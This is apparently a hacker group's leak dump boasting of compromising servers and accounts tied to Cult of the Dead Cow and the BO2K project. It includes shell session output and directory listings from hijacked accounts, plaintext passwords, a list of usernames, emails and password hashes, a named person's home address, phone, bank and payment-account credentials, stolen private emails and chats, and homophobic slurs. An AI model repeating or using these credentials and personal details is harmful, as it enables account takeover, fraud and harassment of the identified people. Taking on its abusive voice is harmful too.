CDC have this thing, they tell hackers that they are not hackers, but then they tell the media that they are. To some extent I believe Ratte about this, but then why have this faggot Oxblood run around talking about sec related stuff that he knows nothing about. "About The Author Oxblood Ruffin is a member of the CULT OF THE DEAD COW (cDc) and Executive Director of Hacktivismo. He uses technology to improve human rights. Oxblood wrote the Hactivismo Declaration and co-aurthored the Hacktivismo Enhanced-Source Software License Agreement (HESSLA)." ^ wtf, i think my description is better. I mean he makes it sound like he is the internet's Martin Luther King Jr. Anyway, yeah..we owned him, here's his shit. $ uname -a; id FreeBSD gilford.textdrive.com 5.5-PRERELEASE FreeBSD 5.5-PRERELEASE #0: Tue Mar 28 11:28:25 GMT 2006 root@gilford.textdrive.com:/usr/obj/usr/src/sys/Text5S i386 uid=1050(lairdbrown) gid=1047(lairdbrown) groups=1047(lairdbrown) $ ls -la /home/lairdbrown/ total 108 drwxr-x--x 12 lairdbrown lairdbrown 512 Aug 25 2006 . drwxr-x--x 726 root wheel 14336 Apr 1 11:16 .. -rwxr-xr-x 1 lairdbrown lairdbrown 771 Jun 24 2005 .cshrc -rwxr-xr-x 1 lairdbrown lairdbrown 166 Jun 24 2005 .forward -rwxr-xr-x 1 lairdbrown lairdbrown 255 Jun 24 2005 .login -rwxr-xr-x 1 lairdbrown lairdbrown 165 Jun 24 2005 .login_conf -rwxr-xr-x 1 lairdbrown lairdbrown 371 Jun 24 2005 .mail_aliases -rwxr-xr-x 1 lairdbrown lairdbrown 331 Jun 24 2005 .mailrc -rwxr-xr-x 1 lairdbrown lairdbrown 1605 Jun 24 2005 .procmailrc -rwxr-xr-x 1 lairdbrown lairdbrown 801 Jun 24 2005 .profile -rwxr-xr-x 1 lairdbrown lairdbrown 852 Jun 24 2005 .shrc drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 .ssh drwxr-xr-x 3 lairdbrown lairdbrown 512 Aug 25 2006 .usermin drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 Maildir drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 cgi-bin drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 etc drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 homes drwxr-xr-x 2 lairdbrown lairdbrown 1024 May 6 00:20 logs drwxr-xr-x 2 lairdbrown lairdbrown 512 Dec 18 2006 php-fastcgi drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 svn drwxr-xr-x 3 lairdbrown lairdbrown 512 Jun 24 2005 web $ ls -la /home/lairdbrown/web/public/ total 60 drwxr-xr-x 7 lairdbrown lairdbrown 512 Sep 1 2006 . drwxr-xr-x 3 lairdbrown lairdbrown 512 Jun 24 2005 .. -rw-r--r-- 1 lairdbrown lairdbrown 318 Nov 13 2005 .htaccess -r--r--r-- 1 root lairdbrown 89 Aug 27 2006 .textdrive -rw-r--r-- 1 lairdbrown lairdbrown 6660 Dec 29 2005 HISTORY.txt -rw-r--r-- 1 lairdbrown lairdbrown 1384 Dec 29 2005 README.txt drwxr-xr-x 4 lairdbrown lairdbrown 512 Jun 24 2005 _ical drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 files drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 images -rw-r--r-- 1 lairdbrown lairdbrown 845 Aug 26 2005 index.php drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 1 2006 rpc drwxr-xr-x 10 lairdbrown lairdbrown 512 Apr 23 22:23 textpattern $ ls -la /home/lairdbrown/web/public/textpattern/ total 172 drwxr-xr-x 10 lairdbrown lairdbrown 512 Aug 27 2006 . drwxr-xr-x 7 lairdbrown lairdbrown 512 Sep 1 2006 .. -rw-r--r-- 1 lairdbrown lairdbrown 264 Aug 27 2006 config.php -rw-r--r-- 1 lairdbrown lairdbrown 638 Aug 26 2005 config.php.default -rw-r--r-- 1 lairdbrown lairdbrown 445 Sep 24 2005 css.php drwxr-xr-x 3 lairdbrown lairdbrown 1024 Aug 27 2006 include -rw-r--r-- 1 lairdbrown lairdbrown 2954 Dec 26 2005 index.php drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 lang drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 1 2006 lib -rw-r--r-- 1 lairdbrown lairdbrown 15127 Aug 26 2005 license.txt drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 publish -rw-r--r-- 1 lairdbrown lairdbrown 31467 Dec 29 2005 publish.php drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 setup -rw-r--r-- 1 lairdbrown lairdbrown 5946 Dec 26 2005 textpattern.css -rw-r--r-- 1 lairdbrown lairdbrown 1596 Dec 18 2005 textpattern.js drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 16 2006 tmp drwxr-xr-x 2 lairdbrown lairdbrown 1024 Aug 27 2006 txp_img drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 update $ cat config.php $ And if you are wondering what this douchebag's pw is, it's "cow666". Fuck. WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED .-. _ _ .-. / \ .-. ((___)) .-. / \ /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ \ / `-' (U) `-' \ / `-' `-' WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED Dear Everyone, I'm an idiot. I thought that I was replying directly to Kevin on my last post and it turns out that this wasn't the case. Here's the deal. Hacktivismo has worked on a Web auditing tool based on "Google hacking" for the past year. Mixter came up with the idea, and eventually I found a great German programmer named Thomas Gehrsitz [handle = init0] to pull the whole thing together. He did a great job. This app works great and is gonna be released in mid-January. I asked Kevin some time ago if we could bring Thomas into the cDc. IMO, he's a great addition; he gets the cDc; and he'd make us all proud. Kevin thought about it and agreed. But there are also some special considerations. There are some new laws on the books in Germany WRT to "computer security". These are basically very wide-ranging laws that make it illegal to do security research unless you work for the government or a "recognized" security firm. There are also other implications. So I want to bring in Thomas but I also want to cover his ass, and Mixy's too. Maybe the German government won't care about the scanner. Cool. Then later we say that it was Mixy's idea and Thomas programmed it. But for right now we feel that it's best just to let KrassKat take the programming credit. Anyway, that's the dealey. Thomas is a great guy with loads of connections in Germany/Europe. We're lucky to get him, IMO. I wasn't trying to be deceptive with anyone in the herd, just trying to keep this "hush-hush" to protect our German friends in case things might get out of hand in the fatherland. L. WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED .-. _ _ .-. / \ .-. ((___)) .-. / \ /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ \ / `-' (U) `-' \ / `-' `-' WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED hacktivismo users/emails/hashes sina_sa:sina@cuodan.net:15e6242e2492acb01426447822e65a1c daftjack:wordwich@iafrica.com:b72aaaba54e6cda312609cd4a8b26836 globin:pasa3651@student.uu.se:cdedcbde56a095199166c5755d0363eb student:sbodine@hotmail.com:20b3e89e3367a41e037c377722565dd3 Nick:kaisho34@hotmail.com:4d7aed35aee4c84e226b7999e965ae65 Diavolo_Incarnato:dakritas@hotmail.com:094289043808967c39ace885e1c5d8cc thop:hoppenjans@mindspring.com:c32d2115a81871cd3653e19a6c13231a ageing_hippie:ageing_hippie@ntlworld.com:01cbb67b867dd51ba37bd9471a971355 _Icognitus_:gparaskevas@msn.com:a36beecb76307bd8e0a7681313ca04a3 ryuroden:taktiktok@yahoo.com:b46c1de1c914eca2dd439388b8422638 Ordosis:S_o_c_r_a_t_e_s@hotmail.com:70a5d255a4109da344424e6bc9bb40c0 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1 comradesmack pg1268972 732 Sep 6 2007 endofnet.html -rwxr-xr-x 1 comradesmack pg1268972 4846 Jun 6 2007 favicon.ico -rw-r--r-- 1 comradesmack pg1268972 199102 Feb 29 09:25 fox.html -rwxr-xr-x 1 comradesmack pg1268972 1369 Feb 20 14:00 goolag.html drwxr-xr-x 2 comradesmack pg1268972 4096 May 6 12:15 images -rwxr-xr-x 1 comradesmack pg1268972 609 Jan 28 12:28 index.html -rwxr-xr-x 1 comradesmack pg1268972 94 Jan 11 13:31 index_o.php -rwxr-xr-x 1 comradesmack pg1268972 15127 Apr 1 2003 license.txt -rw-r--r-- 1 comradesmack pg1268972 90891 Mar 15 15:28 logo.jpg -rwxr-xr-x 1 comradesmack pg1268972 3977 Jan 30 11:57 logobutton.png drwxr-xr-x 18 comradesmack pg1268972 4096 Sep 7 2007 m00sik -rwxr-xr-x 1 comradesmack pg1268972 10067 Jan 30 12:01 menubar.png drwxr-xr-x 4 comradesmack pg1268972 4096 Apr 1 13:36 othershit -rwxr-xr-x 1 comradesmack pg1268972 47748 Oct 1 2007 passwd.txt drwxr-xr-x 2 comradesmack pg1268972 4096 Aug 17 2007 personal drwxr-xr-x 3 comradesmack pg1268972 4096 Feb 19 14:48 pr0n -rw-r--r-- 1 comradesmack pg1268972 56 Mar 15 15:03 proj.txt -rwxr-xr-x 1 comradesmack pg1268972 165 Jan 28 13:37 refer.php drwxr-xr-x 2 comradesmack pg1268972 4096 Jul 30 2007 research -rw-r--r-- 1 comradesmack pg1268972 8318 Mar 26 13:25 session.php -rwxr-xr-x 1 comradesmack pg1268972 35076 Mar 10 10:47 sitemap.xml -rwxr-xr-x 1 comradesmack pg1268972 3717 Mar 10 10:47 sitemap.xml.gz -rw-rw-rw- 1 comradesmack pg1268972 136 Mar 17 09:10 test.html -rw-r--r-- 1 comradesmack pg1268972 101 Mar 13 10:04 test.php -rw-r--r-- 1 comradesmack pg1268972 74 Mar 15 01:08 tester.php drwxr-xr-x 14 comradesmack pg1268972 4096 Dec 12 12:52 trinitywiki drwxr-xr-x 4 comradesmack pg1268972 4096 Jul 30 2007 wp-admin drwxr-xr-x 5 comradesmack pg1268972 4096 Jul 30 2007 wp-content drwxr-xr-x 4 comradesmack pg1268972 4096 Jun 20 2007 wp-includes $ du -hs comradesmack.com/pr0n/ 103M /home/.tasha/comradesmack/comradesmack.com/pr0n WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED .-. _ _ .-. / \ .-. ((___)) .-. / \ /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ \ / `-' (U) `-' \ / `-' `-' WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED dildog - one of the two "hackers" the cdc point to from the 90s that they built rep on. Christien Rioux crioux@gmail.com - zuul69 password for every linkedin, wordpress, support forum, sales website in existence: zuul69 or zuul6969 or Zuul69 781 899 7202 Christien Rioux 294 Linden St Waltham, MA 02452 This guys has more contacts than a spammer. His whole life, online and off, is in this inbox. /////////////////////////////// When L0phtCrack was purchased by @stake (by way of Directed Doodling, and 'SST'), there was some language that you had placed in the contract that, if i am correct, would result in a reversion of ownership to the original authors in the event that the program is not made commercially available for more than a year. If you could take a quick look for a copy of that contract in your files, that would be great. We are considering commercializing the product again in a slightly different form if we can get Symantec (the last owners) to cough it up. We feel they are still bound by these agreements, and we'd like to find fresh copies of them, and get an opinion on how to proceed. --chris ///////////////////////////// Bank of America (www.bankofamerica.com) Acct #00461735XXXX Routing ABA #01100XXXX Wire ABA #02600XXXX Online ID at www.bankofamerica.com is: bitmark1091 Online passcode is: B1tm4XXXX (capital B-one-tm-four-XXXX) Debit/ATM card is in the mail for both us. // X's have been inserted by ZF0. We're too kind. We do archive though. //////////////////////////// your stacythayer.com wordpress account is: l: sthayer p: suffolk!! l0pht chats: /////////////////////////////////////////////// Space Rogue: http://www.darkreading.com/document.asp?doc_id=144609&WT.svl=news1_2 My favorite line, "and Space Rogue (still Space Rogue)" HA! - SR Paul Nash: Who is designing the limited run '08 l0pht reunion tour tshirts? Peiter Mudge Zatko: That would be cool. Why does everyone keep calling me Division Scientist? I'm... /////////////////////////////////////////////// Ya, know for a bunch of people who were very close friends we sure have messed things up. The only person I ever had any ill will against was Mudge and while that is not a hundred percent resolved and probably never will be I've tried to put it behind me. As for the wedding I don't think I ever officially knew you two were married I just assumed it I think. I suspect at the time of your wedding I probably wasn't a very socialable person anyway and most likely would not have attended even if invited. Invitations or lack thereof to things like weddings and such don't bother me. Those are rather personal events and it doesn't bother me in the least if I am or I am not invited. - SR On 4/18/08 8:13 PM, "Stacy Thayer" wrote: > I'm sorry you weren't invited to our wedding. Not that it was a thing...and > look how it turned out. But, he thinks you don't like him. Don't worry, Cris, I like ya just fine. Things definitely got pretty distant after people started trickling away from @stake. I can't say that I've done a very good job of maintaining any kind of social behavior whatsoever. That said, I've always been more concerned that if I make a whole bunch of friends that I wouldn't be able to maintain the relationships responsibly, when I made all that company stuff my top priority. It's coming up on ten years that I will have been fighting to finish the software I started on in 2000. I suppose this is what I was meant to do :P And frankly, if it doesn't work out for me, I'm going to be hella pissed and I'm going to be even more intolerable for a while (if that's possible). Anyway, I dont want anyone to think my distance has been because I dont like them. I dont know how anyone got that idea from me, other than the fact that I've been a pretty grumpy dude lately in general. I suppose you might know what that's like ;) --chris /////////////////////////////////////////////// 'll put up whatever you guys want, just send me the links. I'd rather post links than host content though but as long as it is text that should be OK. At the same time I'd rather not have hundreds of links to crap, just the juicy stuff. I added the Cyber UL since it seems to be getting some press lately and the Buffer Overflow thing since it is listed in Mudge's wikipedia page. Speaking of which we can add all the advisories to the Wikipedia page, I have no qualms about editing it myself as long as someone sends me the links. Or is one of the VDB's out there have a cool search engine where we can link to all the old advisories at once that would be cool to. I'll add the dates to the pages as soon as I have ten minutes. Same for your email forward Tan. Probably Wednesday. /////////////////////////////////////////////// I have two accounts with Authorize.net, and I wish to cancel -one- of them since it's not configured correctly and I dont need to be paying twice. The credentials are: login: bitmark1091 password: B1tm4rk00 secret question: Pet's name secret question answer: Monkey Please terminate that account. Thanks. --chris WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED .-. _ _ .-. / \ .-. ((___)) .-. / \ /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ \ / `-' (U) `-' \ / `-' `-' WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED # # # _ ___ _ ___ _ __ # | | / _ \ | |__ \| |/ / # | |__ | | | |_ ___ __ ___ __| | ) | ' / # | '_ \| | | \ \ /\ / / '_ \ / _ \/ _` | / /| < # | |_) | |_| |\ V V /| | | | __/ (_| |/ /_| . \ # |_.__/ \___/ \_/\_/ |_| |_|\___|\__,_|____|_|\_\ # # # FOR TOO LONG the cDc has ridden # on the coat tails of this tool! # It is owned like the rest of # you # .__=\__ .__==__, # jf' ~~=\, _=/~' `\, # ._jZ' we `\q, /=~ THE `\__ Started this hack not expecting # j5(/ 0wned `\./ END... V\\, BO2K to be dead but in the end # .Z))' _____ BO2K | .____, \)/\ it was and is. So now its # j5(K=~~ ~~~~\=_, | _/=~~~~' `~~+K\\, time to finalize this shit # .Z)\/ `~=L | _=/~ t\ZL # j5(_/.__/===========\__ ~q |j/ .__============___/\J(N, You will not be missed. # 4L#XXXL_________________XGm, \P .mXL_________________JXXXW8L # ~~~~~~~~~~~~~~~~~~~~~~~~~YKWmmWmmW@~~~~~~~~~~~~~~~~~~~~~~~~~~ Fuck Y.ooM # SET IT OFFFFF: .: total 36K drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 . drwxr-xr-x 660 root root 12K Apr 29 13:10 .. drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 cgi-bin drwxrwsr-x 24 nobody 5487 4.0K May 5 13:29 htdocs drwxrwsr-x 7 103 5487 4.0K Jan 30 2004 old_site drwxrwsr-x 8 58519 5487 4.0K Mar 23 2003 old_site2 -rw-rw-r-- 1 126114 5487 27 Jun 30 2005 robots.txt ./cgi-bin: total 20K drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 . drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 .. drwxrwxr-x 3 126114 5487 4.0K Mar 20 13:50 axs drwxrwxr-x 2 127066 5487 4.0K Aug 15 2006 coranto -rwx------ 1 126114 5487 1.2K Feb 24 2007 emailer.pl ./cgi-bin/axs: total 200K drwxrwxr-x 3 126114 5487 4.0K Mar 20 13:50 . drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 .. -rwxrwxrwx 1 126114 users 116K Mar 20 13:50 ax-admin.pl -rwxrwxr-x 1 126114 5487 23K Mar 20 13:50 ax.pl -rwx------ 1 126114 5487 0 Oct 10 2004 axs.dat -rwxrwxr-x 1 126114 5487 11K Aug 16 2005 convert.pl drwxrwxrwx 2 126114 5487 4.0K Aug 16 2005 data -rwxrwxr-x 1 126114 5487 7.7K Aug 16 2005 find_replace.pl -rwx------ 1 126114 5487 4.6K Aug 16 2005 license.html -rwx------ 1 126114 5487 0 Oct 10 2004 log.txt -rwxrwxr-x 1 126114 5487 107 Aug 16 2005 red.gif -rwxrwxr-x 1 126114 5487 8.2K Aug 16 2005 tracker.jpg ./cgi-bin/coranto: total 340K drwxrwxr-x 2 127066 5487 4.0K Aug 15 2006 . drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 .. -rw-rw-r-- 1 126114 users 614 Jul 28 2001 archive.tmpl -rw-rw-r-- 1 126114 users 583 Jul 28 2001 arclink.tmpl -rw-rw-r-- 1 126114 users 8.4K Jun 28 2004 changelog.txt -rwxrwxrwx 1 126114 users 9.5K Jun 28 2004 coranto.cgi -rw-rw-r-- 1 126114 users 3.0K Nov 24 2002 cra_backup.pl -rw-rw-r-- 1 126114 users 8.6K May 5 2003 craddon.pl -rw-rw-r-- 1 126114 users 87K Jun 28 2004 cradmin.pl -rw-rw-r-- 1 126114 users 1.1K Jan 14 2003 cra_modifyusercol.pl -rw-rw-r-- 1 126114 users 13K Sep 9 2003 cra_ncategory.pl -rw-rw-r-- 1 126114 users 78K Jun 28 2004 crcore.pl -rw-rw-r-- 1 126114 users 6.5K Jul 28 2001 crcrypt.pl -rw-rw-r-- 1 126114 users 4.3K Jul 28 2001 crlang.pl -rw-rw-r-- 1 126114 users 32K Jun 28 2004 crlib.pl -rw-rw-r-- 1 126114 users 16K May 5 2003 crsetup.pl -rw-rw-r-- 1 126114 users 2.6K Aug 15 2006 cruser.pl -rw-rw-r-- 1 127066 users 178 Jul 28 2001 .htaccess -rw-rw-r-- 1 126114 users 7.1K Jun 28 2004 viewnews.cgi -rw-rw-r-- 1 126114 users 508 Nov 25 2002 viewnews-readme.txt -rw-rw-r-- 1 126114 users 90 Jul 28 2001 viewnews.tmpl ./htdocs: total 1000K drwxrwsr-x 24 nobody 5487 4.0K May 5 13:29 . drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 .. drwxr-sr-x 2 252872 5487 4.0K Sep 4 2007 bo2k drwxrwsr-x 6 142021 5487 4.0K Oct 15 2006 buda drwxrwxr-x 5 58519 5487 4.0K Jan 17 2007 community -rw-rw-r-- 1 58519 5487 26K May 17 2002 converter.html drwxrwxrwx 3 58519 5487 4.0K Sep 2 2006 coranto drwxrwxr-x 5 58519 5487 4.0K Mar 23 2007 dev drwxrwsr-x 2 126114 5487 4.0K Jul 13 2007 Development drwxr-sr-x 2 126114 5487 4.0K Mar 21 2007 DiggerX drwxrwxr-x 5 58519 5487 4.0K Jan 25 2007 docs -rw-r--r-- 1 126114 5487 11K Feb 7 2007 documentation.html -rw-rw-r-- 1 126114 5487 11K Jan 23 2005 documentationold.html.old -rw-rw-r-- 1 58519 5487 7.6K Jul 2 2003 featurelist.html -rw-rw-r-- 1 126114 5487 5.7K Mar 23 2007 feedback.html drwxr-sr-x 2 252872 5487 4.0K Apr 18 2007 files drwxr-sr-x 2 126114 5487 4.0K Mar 23 2007 Fluffy drwxrwxr-x 2 126114 5487 4.0K Mar 27 2006 forum drwxrwxr-x 10 126114 5487 4.0K Mar 22 13:35 forums drwxrwxr-x 3 58519 5487 4.0K Jul 26 2006 img -rw-rw-r-- 1 126114 5487 5.2K Aug 16 2005 index2.shtml -rw-rw-r-- 1 58519 5487 4.9K Jul 8 2003 index2.shtml.bak -rw-rw-r-- 1 58519 5487 3.4K Apr 3 2003 index3.shtml -rw-rw-r-- 1 126114 5487 3.4K Apr 3 2003 indexold.shtml -rw-r--r-- 1 126114 5487 2.7K Dec 17 2006 index.shtml drwxrwxr-x 2 nobody 5487 4.0K Nov 17 2002 lovebeads -rw-rw-r-- 1 126114 5487 1.1K Dec 17 2006 newfilereleases.old -rw-r--r-- 1 126114 5487 1.5K Mar 21 2007 newfilereleases.txt -rw-rw-r-- 1 58519 5487 3.3K Jul 2 2003 news.shtml -rwx------ 1 126114 5487 61 Jul 12 2007 nov1.sh -rwx------ 1 126114 5487 52 Aug 5 2007 nov2.sh -rwx------ 1 126114 5487 47 Mar 24 10:51 nov3.sh -rwx------ 1 126114 5487 46 Mar 24 10:54 nov4.sh drwxrwxr-x 10 58519 5487 4.0K Dec 11 2006 novice drwx------ 9 126114 5487 4.0K Apr 8 09:44 novice222 drwx------ 2 126114 5487 4.0K Mar 24 10:57 novice222b drwx------ 11 126114 5487 4.0K Aug 8 2007 novice222c drwx------ 10 126114 5487 4.0K Apr 3 19:59 novice222d drwx------ 2 126114 5487 4.0K Sep 15 2006 NoviceP -rw-rw-r-- 1 nobody 5487 253K Jun 3 2002 rk_044.zip -rw-rw-r-- 1 126114 5487 27 Mar 31 12:17 robots.txt -rw-rw-r-- 1 126114 5487 13K Aug 16 2005 rootkit_bookcover.jpg -rw-rw-r-- 1 nobody 5487 22K Jan 22 1997 slant.ttf drwxrwxr-x 5 58519 5487 4.0K Mar 21 2007 software -rw-rw-r-- 1 127066 5487 439K Dec 15 2003 srv_jpeg.zip -rw-rw-r-- 1 nobody 5487 24K Jul 10 2002 srv_scanpw.dll drwx------ 2 126114 5487 4.0K Sep 17 2006 tars -rw-rw-r-- 1 58519 5487 4.2K Jul 2 2003 whatis.html ./htdocs/buda: total 2.6M drwxrwsr-x 6 142021 5487 4.0K Oct 15 2006 . drwxrwsr-x 24 nobody 5487 4.0K May 5 13:29 .. -rw-rw-r-- 1 142021 5487 2.1K Jun 9 2004 1641.jpg -rw-rw-r-- 1 142021 5487 101K Oct 4 2004 1.jpg -rw-rw-r-- 1 142021 5487 31K Oct 4 2004 2.jpg -rw-rw-r-- 1 142021 5487 21K Oct 4 2004 3.jpg -rw-rw-r-- 1 142021 5487 32K Oct 4 2004 4.jpg -rw-rw-r-- 1 142021 5487 83K Nov 11 2004 allgui.jpg -rw-rw-r-- 1 142021 5487 2.6K Jun 9 2004 avatar.gif -rw-rw-r-- 1 142021 5487 2.9K Oct 28 2004 avatar.jpg -rw-rw-r-- 1 142021 5487 14K Jun 14 2004 Buda.jpg -rw-rw-r-- 1 142021 5487 44K Oct 6 2004 crazy.jpg -rw-rw-r-- 1 142021 5487 122K Oct 6 2004 gmail.jpg -rw-rw-r-- 1 142021 5487 39 Oct 17 2004 index.html -rw-rw-r-- 1 142021 5487 3.6K Aug 26 2003 links.html -rw-rw-r-- 1 142021 5487 139K Sep 29 2004 loladas.jpg -rw-rw-r-- 1 142021 5487 225K Jun 29 2004 lol.jpg -rw-rw-r-- 1 142021 5487 257K Dec 23 2004 misc_bopeep.dll -rw-rw-r-- 1 142021 5487 122K Jan 13 2005 misc_bopee.rar drwxrwsr-x 2 142021 5487 4.0K Oct 22 2004 newgui -rw-rw-r-- 1 142021 5487 38K Oct 4 2004 new.jpg -rw-rw-r-- 1 142021 5487 44K Oct 14 2004 newok.jpg drwxrwsr-x 2 142021 5487 12K Jan 21 2005 peepdoc -rw-rw-r-- 1 142021 5487 66K Dec 13 2004 peep jpeg.JPG -rw-rw-r-- 1 142021 5487 30K Dec 13 2004 peep stdn.JPG drwxrwsr-x 2 142021 5487 4.0K Mar 31 2004 pics -rw-rw-r-- 1 142021 5487 3.4K May 6 2004 plugins.html -rw-rw-r-- 1 142021 5487 8.7K Dec 22 2004 POR2.gif -rw-rw-r-- 1 142021 5487 32K May 26 2004 screen.jpg -rw-rw-r-- 1 142021 5487 940K Jun 11 2004 setup.exe -rw-rw-r-- 1 142021 5487 140K Aug 26 2004 telnet.jpg drwxrwsr-x 4 142021 5487 4.0K Jan 26 2004 tut CHECK OUT HOW LAME THESE KIDS ARE: From Fluffy - Novice222: Well i still cant compile it with any visual studio but i will try on with 6.0 and the errors there are a few linking errors: LIBCMTD.lib(dbgheap.obj) : error LNK2005: _malloc already defined in fake_libc.obj LIBCMTD.lib(dbgheap.obj) : error LNK2005: _free already defined in fake_libc.obj LIBCMTD.lib(dbgheap.obj) : warning LNK4006: _malloc already defined in fake_libc.obj; second definition ignored LIBCMTD.lib(dbgheap.obj) : warning LNK4006: _free already defined in fake_libc.obj; second definition ignored Creating library Debug/srv_fun.lib and object Debug/srv_fun.exp LIBCMTD.lib(crt0.obj) : error LNK2001: unresolved external symbol _main Debug/srv_fun.dll : fatal error LNK1120: 1 unresolved externals i dont know what to do. Confused Also one thing that has been on my mind, authentification.... when making a server with it in the gui it says "Single User" does that mean it was made in the thought of making one later that could support multi users? Check Your email Fluffy - Novice222 : Wow thanks, i guess that was directed to my messiness Laughing (it was realy nice that you took the time and i had a look and i think its ok if you post it though i cant compile it myself Crying or Very sad ) however i cant compile it Confused BTW what version are you using to compile your projects, ive tried 2005 and 6.0 and neither works with it..... i just dont understand whats visual studios problem Question anyways i dont realy know how to setup 6.0 ive just new since installed it, so i think i might eventually make it work. Rolling Eyes New Admin Fluffy - Novice222: Wow.... sounds sweet.... though im not good enough to do the programming work..... but if i will try my best Very Happy New Admin Fluffy - Novice222: Ok, i will find info on those and download something Razz . Also I dont know anything about unix but im a really good PHP programmer. New Admin Fluffy - Novice222: Oh thanks.... but are you still going to be here as much or are gonna take some time off? Razz I have Smart FTP 2 which should be able to do all ftp tasks. I know i dont know a lot about these developer programs but i will learn it pretty quickly. New Admin - Digger - Fluffy: Ok, I updated your Title and permissions to Project Administrator.I will try to recruit a person or two that are good with C+ cause I my self don't know it yet. I want to help keep us moving foward and help update and expand Bo2k's plugin selection. New Admin - Fluffy - Digger: Wow.... i did except that sooner or later but not so out of sudden.... i guess we will have to learn C++ then. New Admin Fluffy - Digger: C++, a good tutorial and some aspirins. New Admin Fluffy - Novice: I need some help getting started with making C++ work (Visual C++ 6.0) ive tried to compile botool just as a test and got some errors and i dont know what to do. Well really just two different errors but i dont know how to fix them. cli_botool\clzhcompress.cpp(465) : error C2065: 'FileName' : undeclared identifier I get a lot of these undeclared identifier errors in clzhcompress.h and only there.... ?? And i also get errors about cli_botool\src\explorefunc.cpp(31) : fatal error C1083: Cannot open include file: 'botool.h': No such file or directory botool.h and resource.h not being there though they are in the project as they are supposed to be..... ?? I would be really grateful if you could help me with that. Shell Fluffy - Novice: How can i access the saved files of bo2k? (dont know that stuff Razz ) With shell server right? But i can only connect to my folder which is empty.... Devteam Fluffy - Novice: I am updating the site since its kinda outdated. (just links and stuff) in http://bo2k.com/dev/devteam.html what should be displayed as your name? Coranto Fluffy - Novice: How do i use coranto? Or do i have to do the news manually? CVS Fluffy - Novice: I have a problem with CVS.... and i dont know what to do..... no matter what i try i cant connect..... i get: ....\Temp\TortoiseCVS make new module temp\: cvs.exe -q import -m bo2k_plugins tcvs-vendor tcvs-release CVSROOT=:ext:fluffy-stuff@bo2k.cvs.sourceforge.net:/cvsroot/bo2k cvs [import aborted]: end of file from server (consult above messages if any) Error, CVS operation failed do you know anything about that? New Source Fluffy - Novice: Ok.... for the first time everything is working however i downloaded all the bo2k files via CVS but the stuff is old.... where are the new sources?? (sorry for spamming like that but im just not very used to this yet) New Source Fluffy - Novice: What about bopeep? The only source download for it i found was version 0.9 and in the SSH i found version 1.1 (i found that out after compiling it). I would really like the new source and see if i can fix the copy button..... because till now visual studio hasnt worked but now it does so i can compile the plugins which means that i can make it. Only one question for that..... which way did you intend to make the copy button work? (i heard you can convert the screen to an HBITMAP and then copy it to clipboard). PS: phpBB works again all out of sudden..... Coranto Fluffy - Novice: I have a problem with the coranto folder.... when i try to change the ch back to 770 SSH tells me "Error writing file atributes"..... Coronto Fluffy - Digger: (sorry if it took some time to respond.... my phpBB account was screwed....) Ok account name DiGgErX and pass "diggerx" non capital (you should change that) Well after posting a news in coranto you will have to use SSH Secure Shell to move the new news files into the coranto folder.... you will only need a single command. http://charlotte.at.northwestern.edu/bef/sshdist.html#windows download it and connect to sourceforge (shell.sourceforge.net port 22). In file transfer client you can see all the bo2k website data (/home/groups/b/bo/bo2k/htdocs/) but you wont need that to move the news files into the coranto folder.... instead open the Shell Client and put in the command: cp /tmp/persistent/bo2kdata/NewsFiles/* /home/groups/b/bo/bo2k/htdocs/coranto so you wont always have to browse down to those folders. You will also need a CVS tool for the bo2k sources http://www.tortoisecvs.org/ and an ftp client http://www.softpedia.com/get/Internet/FTP-Clients/SmartFTP.shtml . The ones above are just those which i recommend... you can use any tool you want. Info Passwd Novice - Digger: Digger you can forward this to Fluffy..... Sorry for the delay guys but I was away and didn't have access to the necessary material. Here are all the passwords to the mailing lists.....they aren't used much anymore...they have been deemed almost obsolete by the 